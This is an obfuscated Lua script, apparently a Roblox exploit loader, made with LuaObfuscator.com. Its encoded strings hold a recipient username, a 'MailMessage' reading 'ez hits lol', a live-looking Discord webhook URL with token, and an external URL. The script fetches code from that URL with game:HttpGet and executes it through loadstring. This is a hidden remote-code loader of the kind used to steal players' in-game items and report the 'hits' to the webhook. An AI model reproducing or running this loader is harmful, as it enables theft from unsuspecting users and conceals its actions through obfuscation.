--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31) if (v1(v31,2)==79) then v20=v0(v3(v31,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v31,16));if v20 then local v102=v5(v71,v20);v20=nil;return v102;else return v71;end break;end end end end);v21=nil;v18=1;end if (v18==3) then function v25() local v32=0 -(0 -0) ;local v33;local v34;local v35;local v36;local v37;local v38;while true do if (v32==(8 -5)) then if (v37==(0 -0)) then if (v36==(0 -0)) then return v38 * (619 -(555 + 64)) ;else v37=932 -(857 + 74) ;v35=568 -(367 + 201) ;end elseif (v37==(2974 -(214 + 713))) then return ((v36==(0 + 0)) and (v38 * ((1 + 0)/(877 -(282 + 595))))) or (v38 * NaN) ;end return v8(v38,v37-1023 ) * (v35 + (v36/((1639 -(1523 + 114))^(35 + 12 + 5)))) ;end if (v32==(0 -0)) then v33=v24();v34=v24();v32=1066 -(68 + 997) ;end if (v32==(1272 -(226 + 1044))) then v37=v21(v34,91 -70 ,148 -(32 + 85) );v38=((v21(v34,32 + 0 )==(1 + 0)) and  -(3 -2)) or ((1737 -779) -((1844 -(802 + 150)) + 65)) ;v32=7 -4 ;end if (v32==1) then v35=(998 -(915 + 82)) -0 ;v36=(v21(v34,1 -0 ,370 -(87 + (744 -481)) ) * (((107 + 75) -(67 + 113))^(24 + 8))) + v33 ;v32=4 -2 ;end end end v26=nil;function v26(v39) local v40=0 -0 ;local v41;local v42;while true do if (v40==((1206 -(10 + 8)) -(1069 + 118))) then v41=v3(v16,v19,(v19 + v39) -(2 -1) );v19=v19 + v39 ;v40=2;end if (v40==(0 -0)) then v41=nil;if  not v39 then v39=v24();if (v39==0) then return "";end end v40=1 + 0 ;end if (v40==(4 -1)) then return v6(v42);end if (v40==(2 + 0)) then v42={};for v81=792 -(368 + 423) , #v41 do v42[v81]=v2(v1(v3(v41,v81,v81)));end v40=(34 -25) -6 ;end end end v27=v24;v18=4;end if (v18==4) then v28=nil;function v28(...) return {...},v12("#",...);end v29=nil;function v29() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v43==0) then local v76=0;while true do if ((0 -0)~=v76) then else local v100=0;while true do if (v100==(1764 -(454 + 1309))) then v76=1 + 0 ;break;end if (v100==0) then v44=0 -0 ;v45=nil;v100=1;end end end if (v76~=1) then else v43=1 -0 ;break;end end end if (v43~=2) then else v48=nil;v49=nil;v43=8 -5 ;end if (v43==(286 -(134 + 151))) then local v77=0;while true do if (v77==(1665 -(970 + 695))) then local v101=0;while true do if (v101~=(0 -0)) then else v46=nil;v47=nil;v101=1;end if (v101==(1991 -(582 + 1408))) then v77=3 -2 ;break;end end end if (v77~=(1 -0)) then else v43=7 -5 ;break;end end end if (v43~=(1827 -(1195 + 629))) then else v50=nil;while true do local v83=0 -0 ;while true do if (v83~=(242 -(187 + 54))) then else if (v44==(781 -(162 + 618))) then local v109=0;local v110;while true do if (0==v109) then v110=0;while true do if (v110==(1 + 0)) then v50={};v44=2;break;end if (v110~=(0 + 0)) then else local v135=0;local v136;while true do if (v135~=(0 -0)) then else v136=0 -0 ;while true do if (v136==(1 + 0)) then v110=1637 -(1373 + 263) ;break;end if (v136~=0) then else v48={v45,v46,nil,v47};v49=v24();v136=1;end end break;end end end end break;end end end if (v44~=0) then else local v111=0;local v112;local v113;while true do if (v111==(1 + 0)) then while true do if (v112==(0 -0)) then v113=0 -0 ;while true do if (v113~=(1384 -(746 + 638))) then else local v185=0;while true do if (v185==0) then v45={};v46={};v185=1;end if (v185~=1) then else v113=1 + 0 ;break;end end end if (v113==1) then v47={};v44=1 -0 ;break;end end break;end end break;end if ((341 -(218 + 123))==v111) then v112=0;v113=nil;v111=1582 -(1535 + 46) ;end end end break;end if (v83~=0) then else if (v44==(2 + 0)) then local v114=0;while true do if (v114==1) then for v118=1 + 0 ,v24() do local v119=560 -(306 + 254) ;local v120;while true do if (v119~=(0 + 0)) then else v120=v22();if (v21(v120,1,1 -0 )~=0) then else local v186=1467 -(899 + 568) ;local v187;local v188;local v189;local v190;local v191;while true do if (v186~=1) then else v189=nil;v190=nil;v186=2;end if (v186~=(0 + 0)) then else v187=0 -0 ;v188=nil;v186=604 -(268 + 335) ;end if (2==v186) then v191=nil;while true do if (v187==1) then local v197=0;while true do if (v197~=0) then else v190=nil;v191=nil;v197=1;end if (v197~=1) then else v187=292 -(60 + 230) ;break;end end end if (v187~=(572 -(426 + 146))) then else v188=0;v189=nil;v187=1 + 0 ;end if (v187~=2) then else while true do if (v188==(1458 -(282 + 1174))) then local v199=811 -(569 + 242) ;local v200;while true do if (v199==(0 -0)) then v200=0 + 0 ;while true do if (v200==0) then local v208=1024 -(706 + 318) ;while true do if (v208~=(1251 -(721 + 530))) then else if (v21(v190,1272 -(945 + 326) ,2 -1 )==(1 + 0)) then v191[2]=v50[v191[2]];end if (v21(v190,2,2)~=1) then else v191[703 -(271 + 429) ]=v50[v191[3 + 0 ]];end v208=1;end if (v208==1) then v200=1501 -(1408 + 92) ;break;end end end if (v200==1) then v188=1089 -(461 + 625) ;break;end end break;end end end if (v188==0) then local v201=1288 -(993 + 295) ;local v202;while true do if (v201==(0 + 0)) then v202=1171 -(418 + 753) ;while true do if ((1 + 0)==v202) then v188=1;break;end if (v202==0) then local v209=0 + 0 ;local v210;while true do if (v209~=0) then else v210=0 + 0 ;while true do if (v210==(1 + 0)) then v202=1;break;end if (v210==0) then v189=v21(v120,2,3);v190=v21(v120,4,535 -(406 + 123) );v210=1;end end break;end end end end break;end end end if (v188==(1770 -(1749 + 20))) then local v203=0;local v204;while true do if (v203~=0) then else v204=0;while true do if (v204==(0 + 0)) then local v211=1322 -(1249 + 73) ;local v212;while true do if (v211==0) then v212=0;while true do if (v212==1) then v204=1;break;end if (v212==0) then v191={v23(),v23(),nil,nil};if (v189==0) then local v217=0 -0 ;local v218;local v219;while true do if (v217~=(0 -0)) then else v218=1900 -(106 + 1794) ;v219=nil;v217=1 + 0 ;end if (v217==1) then while true do if (v218==0) then v219=0 + 0 ;while true do if (v219==(0 -0)) then v191[7 -4 ]=v23();v191[118 -(4 + 110) ]=v23();break;end end break;end end break;end end elseif (v189==1) then v191[587 -(57 + 527) ]=v24();elseif (v189==(1429 -(41 + 1386))) then v191[106 -(17 + 86) ]=v24() -(2^(11 + 5)) ;elseif (v189==(6 -3)) then local v222=0;local v223;while true do if (v222==0) then v223=0 -0 ;while true do if (v223==0) then v191[3]=v24() -((168 -(122 + 44))^16) ;v191[4]=v23();break;end end break;end end end v212=1 -0 ;end end break;end end end if (v204==1) then v188=2;break;end end break;end end end if (v188~=(9 -6)) then else if (v21(v190,3 + 0 ,3)==(1 + 0)) then v191[4]=v50[v191[7 -3 ]];end v45[v118]=v191;break;end end break;end end break;end end end break;end end end v44=3;break;end if (v114==0) then local v117=65 -(30 + 35) ;while true do if (v117==1) then v114=1;break;end if (v117==(0 + 0)) then for v141=1258 -(1043 + 214) ,v49 do local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==(3 -2)) then v145=nil;v146=nil;v142=2;end if (v142==0) then v143=1212 -(323 + 889) ;v144=nil;v142=2 -1 ;end if (v142==(582 -(361 + 219))) then while true do if (v143==(321 -(53 + 267))) then v146=nil;while true do if (v144==(0 + 0)) then v145=v22();v146=nil;v144=1;end if (v144~=(414 -(15 + 398))) then else if (v145==1) then v146=v22()~=(982 -(18 + 964)) ;elseif (v145==2) then v146=v25();elseif (v145~=(11 -8)) then else v146=v26();end v50[v141]=v146;break;end end break;end if (v143==0) then local v196=0 + 0 ;while true do if (v196==1) then v143=1;break;end if (v196==(0 + 0)) then v144=0;v145=nil;v196=851 -(20 + 830) ;end end end end break;end end end v48[3]=v22();v117=1;end end end end end if ((3 + 0)==v44) then local v115=126 -(116 + 10) ;local v116;while true do if ((0 + 0)==v115) then v116=0;while true do if (v116==(738 -(542 + 196))) then local v138=0 -0 ;while true do if (v138~=0) then else for v194=1 + 0 ,v24() do v46[v194-1 ]=v29();end return v48;end end end end break;end end end v83=1 + 0 ;end end end break;end end end v18=5;end if (v18==1) then function v21(v51,v52,v53) if v53 then local v72=0 + 0 ;local v73;while true do if (v72==(0 -0)) then v73=(v51/((4 -2)^(v52-(2 -1))))%((1553 -(1126 + 425))^(((v53-(1 -0)) -(v52-((4 -3) + (753 -(239 + 514))))) + 1)) ;return v73-(v73%(406 -(42 + 76 + 287))) ;end end else local v74=0 -0 ;local v75;while true do if (v74==(0 + 0)) then v75=(1123 -((264 -146) + 292 + 711))^(v52-(2 -1)) ;return (((v51%(v75 + v75))>=v75) and (2 -1)) or 0 ;end end end end v22=nil;function v22() local v54=1329 -((1873 -1076) + 532) ;local v55;while true do if (v54==((1202 -(373 + 829)) + 0)) then v55=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v54=1;end if (v54==1) then return v55;end end end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v56,v57,v58) local v59=0;local v60;local v61;local v62;while true do if (v59==0) then v60=v56[1];v61=v56[2];v59=1;end if (v59==1) then v62=v56[3];return function(...) local v84=v60;local v85=v61;local v86=v62;local v87=v28;local v88=1;local v89= -1;local v90={};local v91={...};local v92=v12("#",...) -1 ;local v93={};local v94={};for v98=0,v92 do if (v98>=v86) then v90[v98-v86 ]=v91[v98 + 1 ];else v94[v98]=v91[v98 + 1 ];end end local v95=(v92-v86) + 1 ;local v96;local v97;while true do local v99=0;while true do if (v99==1) then if (v97<=3) then if (v97<=1) then if (v97==0) then do return;end else local v121=v96[2];local v122,v123=v87(v94[v121](v13(v94,v121 + 1 ,v96[3])));v89=(v123 + v121) -1 ;local v124=0;for v139=v121,v89 do local v140=0;while true do if (v140==0) then v124=v124 + 1 ;v94[v139]=v122[v124];break;end end end end elseif (v97==2) then v94[v96[2]]=v58[v96[3]];else local v127=0;local v128;local v129;while true do if (v127==1) then v94[v128 + 1 ]=v129;v94[v128]=v129[v96[4]];break;end if (v127==0) then v128=v96[2];v129=v94[v96[3]];v127=1;end end end elseif (v97<=5) then if (v97==4) then local v130=0;local v131;local v132;while true do if (v130==3) then v88=v88 + 1 ;v96=v84[v88];v94[v96[2]]=v96[3];v88=v88 + 1 ;v130=4;end if (v130==1) then v96=v84[v88];v58[v96[3]]=v94[v96[2]];v88=v88 + 1 ;v96=v84[v88];v130=2;end if (v130==0) then v131=nil;v132=nil;v94[v96[2]]=v96[3];v88=v88 + 1 ;v130=1;end if (v130==8) then v94[v96[2]]=v96[3];break;end if (v130==7) then v94[v132 + 1 ]=v131;v94[v132]=v131[v96[4]];v88=v88 + 1 ;v96=v84[v88];v130=8;end if (v130==5) then v94[v96[2]]=v58[v96[3]];v88=v88 + 1 ;v96=v84[v88];v94[v96[2]]=v58[v96[3]];v130=6;end if (v130==2) then v94[v96[2]]=v96[3];v88=v88 + 1 ;v96=v84[v88];v58[v96[3]]=v94[v96[2]];v130=3;end if (v130==4) then v96=v84[v88];v58[v96[3]]=v94[v96[2]];v88=v88 + 1 ;v96=v84[v88];v130=5;end if (6==v130) then v88=v88 + 1 ;v96=v84[v88];v132=v96[2];v131=v94[v96[3]];v130=7;end end else local v133=0;local v134;while true do if (v133==0) then v134=v96[2];v94[v134]=v94[v134](v13(v94,v134 + 1 ,v89));break;end end end elseif (v97<=6) then v94[v96[2]]();elseif (v97>7) then v58[v96[3]]=v94[v96[2]];else v94[v96[2]]=v96[3];end v88=v88 + 1 ;break;end if (0==v99) then v96=v84[v88];v97=v96[1];v99=1;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==2) then function v23() local v63=731 -(476 + 255) ;local v64;local v65;while true do if (v63==(1131 -(369 + (999 -(64 + 174))))) then return (v65 * (149 + 16 + 91)) + v64 ;end if (v63==(0 -(0 -0))) then v64,v65=v1(v16,v19,v19 + 2 );v19=v19 + 2 ;v63=1 -(336 -(144 + 192)) ;end end end v24=nil;function v24() local v66,v67,v68,v69=v1(v16,v19,v19 + (219 -(42 + (1754 -(1183 + 397)))) );v19=v19 + 4 + 0 ;return (v69 * (13897772 + 2879444)) + (v68 * ((84763 -56920) + 37693)) + (v67 * (1760 -(363 + 1141))) + v66 ;end v25=nil;v18=3;end end end return v15("LOL!0A3O0003083O00557365726E616D65030E3O002O786E657665726B617A616E2O78030B3O004D61696C4D652O73616765030B3O00657A2068697473206C6F6C03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313O323136322O363831363537333537302F4A2O6B5662494F4B35464F5F3244582D7874574B374536654853777251756A5342764F7558316F674548762D496C736B4E54364C584546714A362D6E3443523342492O30030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F65676F72696B7573612E73706163652F2O7464000E3O0012043O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00122O000100083O00202O00010001000900122O0003000A4O0001000100034O00055O00022O00063O000100016O00017O00",v9(),...);
